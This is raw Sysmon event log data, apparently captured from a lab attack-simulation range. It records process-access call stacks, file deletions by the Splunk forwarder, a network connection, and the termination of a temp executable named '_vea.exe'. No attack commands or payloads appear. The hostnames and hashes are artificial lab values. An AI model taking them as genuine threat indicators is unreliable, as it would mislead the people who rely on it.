11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:48.692{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B45B92DEAF706E996B25D0AEEE7407,SHA256=5BC49CBD8C56B946BB15490BF325F2FDCDA56AE4BB550F2AF1E0E22E08010D87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218582Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:48.404{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C3C0F8AA3CCCE9104A7AF07A3C69B06,SHA256=F0A40C6D638FF245560620966538977D002D75D4EA0C1886BA1247A82FBFAF3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218581Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.695{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51469-false10.0.1.12-8089- 10341000x8000000000000000218580Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:48.122{4F8D34B0-141B-6216-A904-000000003902}23121804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218579Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:48.091{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=334029B1A1DC66C449C45C94687B2DE0,SHA256=6CA26762250C16043D757A01AB5517841103A337E7727E089ABEA62C0181A64A,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000294308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:49.796{C8EA50B7-1402-6216-8B06-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000294307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:49.696{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0845A14C4FEBE7E6044436E29103D03A,SHA256=7180EC1691E8B351149D1272FCFA15BE8EE95EDC30D78D5F9EB2BA8B21FD73AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.623{4F8D34B0-141D-6216-AA04-000000003902}2796724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-141D-6216-AA04-000000003902}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 